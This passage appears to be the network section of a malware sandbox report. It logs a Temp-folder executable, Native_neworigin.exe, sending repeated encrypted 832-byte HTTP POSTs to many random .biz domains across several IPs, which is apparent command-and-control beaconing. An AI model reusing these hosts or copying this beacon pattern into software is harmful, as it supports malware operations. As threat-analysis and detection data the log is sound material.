14 | 192.168.2.5 | 49844 | 172.234.222.138 | 80 | 5488 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:16.597333908 CET | 347 | OUT | POST /fckn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:16.597368002 CET | 832 | OUT | Data Raw: 13 e8 28 5f 4c 7a fb 8b 34 03 00 00 d2 7a e9 cc 5d f2 d9 c5 06 2e 16 97 79 59 bc 61 18 a6 07 25 a5 fb e2 28 6d 04 0b 5e 13 f2 21 f9 d9 17 6f 55 47 f6 8a 69 22 97 ba a3 3a 76 a3 69 df b8 1c 73 05 16 55 68 78 3e b2 05 41 3c 3a 4f 43 e4 f4 76 85 66
Data Ascii: (_Lz4z].yYa%(m^!oUGi":visUhx>A<:OCvf^EF7qbsPqE#.[~,(e[AZ8TGA:J<c!UrJHc4.ba`0v3[e/qQI\7.M3Y^KcoVA


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                15192.168.2.54985018.141.10.107805488C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.416853905 CET350OUTPOST /nsnnyu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.416897058 CET832OUTData Raw: a3 49 95 26 80 ff d0 a3 34 03 00 00 d2 7f 8c 71 4c 9d d5 a9 fb 1a c0 f8 56 98 fe 81 7c 79 9d 50 1a 88 42 08 7e 34 8d 23 79 18 67 37 48 b2 52 e6 2f 47 b3 c3 34 d3 be c4 9b 3c 2b 31 31 42 12 68 01 e9 e5 23 7b 31 c3 66 53 3a ed da 7a c9 8e eb 50 24
                                                                                                                                                                                                                                                                                                                                Data Ascii: I&4qLV|yPB~4#yg7HR/G4<+11Bh#{1fS:zP$@zy= zm<j(Vw")|n@#|B96?We[35USUNT'krtdr$wUA&pomGn=70H6FX$H2Fl
Nov 20, 2024 10:25:18.825320005 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:25:18 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=8e6f60a39ef17bb7ea1bbdf053155fca|8.46.123.75|1732094718|1732094718|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49872 | 54.244.188.177 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:21.297322035 CET | 358 | OUT | POST /cakchsrrlpkav HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:25:21.297322035 CET | 832 | OUT | Data Raw: 9b 2c 7b fa e5 dd fc fd 34 03 00 00 22 ce d5 49 d1 bb d3 1c 1c e0 5f dc 61 71 af c3 a5 d1 a8 98 bf a8 35 93 75 c5 6c 5b 26 6e a9 38 ad 57 42 95 dd 21 8d 3a e8 48 d6 62 81 64 16 35 0d ed 53 4f e2 bf 34 97 0f 97 33 ab f1 6c 06 bd 91 3e 4a bd 96 46
Nov 20, 2024 10:25:22.013844967 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:25:21 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=84178265857989496ca9be2adb3a714b|8.46.123.75|1732094721|1732094721|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49878 | 18.141.10.107 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:22.322509050 CET | 347 | OUT | POST /kfhn HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:25:22.323448896 CET | 832 | OUT | Data Raw: f0 00 1a 20 81 b4 0c 5f 34 03 00 00 f5 ad 7d 73 81 04 51 83 4c e0 53 dc 45 20 a4 0e c8 ce 6b ef 9e ea 16 2d 5a 13 5e 21 d6 5c 81 c8 51 f7 a9 25 1c a6 e5 a9 da 18 65 98 c8 e2 53 28 38 c4 72 7b 08 3d d8 dd b7 c5 04 c5 a4 de d6 58 91 69 cc 43 77 e3
Nov 20, 2024 10:25:23.710129976 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:25:23 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=e81d7120ca8c1c5fa80cfc8253030720|8.46.123.75|1732094723|1732094723|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49888 | 54.244.188.177 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:24.558749914 CET | 343 | OUT | POST /rb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:25:24.558842897 CET | 832 | OUT | Data Raw: 54 62 06 e1 69 35 9a 3f 34 03 00 00 b1 91 c8 c3 7d e9 4d 08 c7 49 96 49 a7 c2 2f 91 f8 34 22 c3 0f 4a fc b8 0e 75 40 c4 25 5e 9b cd 5b 13 54 b3 77 57 34 f4 3d aa f3 40 2d 19 77 b2 f2 61 d9 a6 dc dd d3 4d 33 7c 79 45 c6 fd 38 07 a9 ed 0a a5 7a 26


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49894 | 54.244.188.177 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:24.955837965 CET | 350 | OUT | POST /xkcbxhnrv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 832
Nov 20, 2024 10:25:24.955837965 CET | 832 | OUT | Data Raw: 68 86 9b bf 16 fb fc 9a 34 03 00 00 b9 84 14 6b 27 2a 7a 13 79 3e bc f6 71 95 6d eb 67 5d 14 12 52 7a 27 ee 93 a2 bb 9a a4 52 8b b5 f3 50 71 5d ef 40 67 42 1e 01 22 0a 4e a7 01 49 c4 54 b0 08 13 ad 5c 76 f2 7d e2 ef 5a f2 06 46 b8 0d f3 01 de db
Nov 20, 2024 10:25:25.667771101 CET | 407 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 20 Nov 2024 09:25:25 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d4b7aba01b2a4d8d22717f2693dba38c|8.46.123.75|1732094725|1732094725|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                20192.168.2.54990144.221.84.105802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.848561049 CET358OUTPOST /dkglfbueemimxh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.848697901 CET832OUTData Raw: 28 98 c1 47 61 02 83 46 34 03 00 00 b8 56 75 1e 7f 19 37 d2 07 73 c1 53 40 2c 17 83 7d 33 63 b0 b0 a6 92 05 88 68 3b 34 d7 45 69 ef a6 fc cf f0 a5 1e 3e db d6 18 e2 ca 8a 14 be 0e 16 83 4f 73 fd d9 73 08 92 df 03 78 dd 0f 54 d0 c9 34 75 78 1c e9
                                                                                                                                                                                                                                                                                                                                Data Ascii: (GaF4Vu7sS@,}3ch;4Ei>OssxT4uxJQT|A2EWQ&0|z1Tc "Q0,;Tv6kj$3|&OxOfPW;&2HuWWidfM'frwW$$:xmhvJ6Fo&y{
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.332681894 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=4ce1adf9b7e35a785528e9b901b01757|8.46.123.75|1732094726|1732094726|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                21192.168.2.549907172.234.222.138802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.565665960 CET352OUTPOST /krmiyakxt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.565665960 CET832OUTData Raw: b9 11 32 44 dc 19 06 45 34 03 00 00 39 40 84 85 ce 78 58 7c d6 19 04 70 e6 b9 7a 52 24 49 db af e1 80 e1 6c e7 4e 54 cb 43 13 49 dc 2d 02 91 7b 3d 30 e6 0c 29 0c f7 55 50 e9 88 7f 44 3f 19 af fd f0 e9 a6 1a e9 1b 37 41 03 a8 3f 5e 79 09 97 27 83
                                                                                                                                                                                                                                                                                                                                Data Ascii: 2DE49@xX|pzR$IlNTCI-{=0)UPD?7A?^y'Q\ K[6#8S297"6j;HID{lt=;P\lU"RRp0$YT_:^dmI?0:TPtRq&Z-


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                22192.168.2.549912172.234.222.138802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.367327929 CET349OUTPOST /cbhxke HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.367327929 CET832OUTData Raw: e5 f9 65 57 4f b0 a2 bf 34 03 00 00 70 ed 87 0c ad ba 81 85 b3 68 32 16 4a 4e 90 bd da 3a d6 47 51 ad 43 f0 68 74 46 4b bf 7d 5e 83 b1 f8 77 28 a4 4a a8 e0 50 08 66 74 8d 70 49 7f 16 05 94 fa 05 98 90 a2 40 5e b8 46 00 e8 98 a5 58 32 82 24 c7 51
                                                                                                                                                                                                                                                                                                                                Data Ascii: eWO4ph2JN:GQChtFK}^w(JPftpI@^FX2$QqW#J>AIUx@_!l9L$VSf%"V~\#tWFE[ X2l!OO>7}1M!W!^[[^o'oewTmeVw&a


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                23192.168.2.54991418.141.10.107802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET348OUTPOST /mwpi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                Content-Length: 832
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.945475101 CET832OUTData Raw: 77 8a d8 8a 11 5a d1 a6 34 03 00 00 a1 67 5b 69 54 42 3d c2 c1 37 dc 30 fb 15 f3 9b d4 c1 ca 89 89 7e 39 18 9a ec 45 3e 9c 80 b5 95 69 93 71 0b fa 36 22 56 9a 72 db 98 27 bc cd 5d 3e ea f9 db 94 17 58 48 c4 e5 d2 c6 30 51 52 08 56 16 60 35 f4 c8
                                                                                                                                                                                                                                                                                                                                Data Ascii: wZ4g[iTB=70~9E>iq6"Vr']>XH0QRV`5L@.9f+W%wvneCGGT%(H:w`^h~-Uo>.D~i4/AeF!SBx'`\7E@@ OR6P\.e|2
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.359961987 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:25:29 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: btst=7eb9827cd271f407156a1499507ec62e|8.46.123.75|1732094729|1732094729|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                24192.168.2.54992582.112.184.197802676C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.709470987 CET348OUTPOST /pfrxci HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:29.709494114 CET | 832 | OUT | Data Raw: fe c0 b7 ce 83 a7 dd 07 34 03 00 00 00 2f d2 b3 3a cb 1d 3a 02 c4 ee 01 70 8a 43 f2 9e 61 d3 7b 86 76 9b 6f 90 92 53 25 d9 58 3c b0 e4 31 19 09 d2 aa 30 cd 30 40 e8 d7 e3 85 94 00 9b 8f c9 74 f5 dd a9 46 c4 5a 15 4f a3 f2 c1 79 23 f4 94 4b f9 81


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49950 | 82.112.184.197 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:32.818851948 CET | 355 | OUT | POST /bqdrapkxlqcka HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:32.818862915 CET | 832 | OUT | Data Raw: 4c 05 b1 96 da 26 28 e3 34 03 00 00 b7 40 85 8e e4 b4 09 41 f8 86 bd 70 bc bb 3e 7e e7 48 d1 e9 71 40 cc bf 27 86 a6 1e f6 e3 28 17 a1 8f 90 25 b9 36 d4 d8 12 5f 6b 56 6e b4 a2 fa 02 54 ad b2 b7 18 06 15 f5 da df 45 d3 3e 61 c0 74 9a 0d 34 e8 38


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50005 | 82.112.184.197 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:25:41.069530010 CET | 347 | OUT | POST /ga HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:25:41.069550991 CET | 832 | OUT | Data Raw: 7c 4e e9 d2 20 8b f6 9e 34 03 00 00 95 b2 5c b7 4a 1f 51 2c bd a2 2b 61 94 5c 4c 66 c8 f7 54 ba 2f 07 c9 2a df cb fe 31 6d 23 ea 9a 67 2b 76 4f 5f db 9b 98 c9 80 e9 eb c3 97 53 e6 67 6e 71 34 47 0b 2c a7 ed db a7 ed 4a e1 96 d5 f6 a1 b1 31 2a 0c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50010 | 82.112.184.197 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:02.903178930 CET | 350 | OUT | POST /mshka HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:02.903198004 CET | 832 | OUT | Data Raw: 74 f0 d4 4a f5 7e 35 4a 34 03 00 00 73 f4 14 4b 40 8c f1 10 54 db 23 bb ac b2 b2 bd 8f cc 08 80 72 d6 e3 7e c9 a1 9c 8c 55 39 90 c4 85 7f c1 bb 87 de 7c 41 30 e7 93 38 9e cd 74 29 97 bd 3b 36 98 33 b9 0c cc 3f 6d d4 c3 f1 dd 50 7b 16 8f b9 cc 3f


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50011 | 47.129.31.212 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:24.479659081 CET | 355 | OUT | POST /mvnulpmrxwqe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:24.479702950 CET | 832 | OUT | Data Raw: 32 ff 28 ad 0e 4d da 05 34 03 00 00 c1 8f e2 6e bd 97 16 3f 86 04 3e 72 0f 53 d2 04 06 33 24 f3 05 12 d5 ac 4d 02 fb ee 39 59 2b 42 b8 49 b4 45 c8 83 56 fa 0f fa c1 66 bf 6b 1d 17 68 2b 92 9a e0 da d3 53 a5 87 7d 63 32 6d ed d5 62 6b 13 b8 6a 59
Nov 20, 2024 10:26:25.945547104 CET | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0d53807a14404a912b44b1e9e3367df5|8.46.123.75|1732094785|1732094785|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50012 | 13.251.16.150 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:26.493447065 CET | 348 | OUT | POST /ueacef HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 832
Nov 20, 2024 10:26:26.493489027 CET | 832 | OUT | Data Raw: a4 36 12 b7 49 82 b5 78 34 03 00 00 a9 30 b2 d6 ba 2c 31 d3 47 ae e6 d6 c5 0c 0c 96 c5 28 dd 34 09 f8 97 ef 73 47 4e f3 94 45 65 13 f0 87 80 1a 8c 0d 3f 02 3e 41 62 85 61 a9 da d1 95 ed ed c8 f9 14 71 ae 21 c5 bb 43 cf ab 56 29 09 26 18 a5 a7 40
Nov 20, 2024 10:26:27.946568966 CET | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 Nov 2024 09:26:27 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5ae8f3a7a028cc10158c7e0a496ce817|8.46.123.75|1732094787|1732094787|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50013 | 44.221.84.105 | 80 | 2676 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 10:26:28.015208960 CET | 361 | OUT | POST /qologlfowpsjwwtq HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  Host: saytjshyf.biz
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
  Content-Length: 832
Nov 20, 2024 10:26:28.015237093 CET | 832 | OUT | Data Raw: b0 63 33 7a 36 3b af 3c 34 03 00 00 59 f7 26 83 bd df 82 21 e9 26 09 70 bf 2b af 0d bd 8b 05 bd a0 47 98 33 44 8f 0f 91 3f 17 c4 08 53 44 92 81 32 26 59 60 cf c4 d2 d2 d6 cf 2a d5 ce 0e f9 be 45 c0 db b7 68 f3 8b 8b a6 b8 ab 9b d5 b2 24 f9 a3 17
  Data Ascii: c3z6;<4Y&!&p+G3D?SD2&Y`*Eh$:(ReTkN3Qs#:MR9yiwEcvlP(HX]gJ3"m3k_&lbh+o9Q6##I>Y-$%t+F@<S3$i
Nov 20, 2024 10:26:28.502311945 CET | 411 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Wed, 20 Nov 2024 09:26:28 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
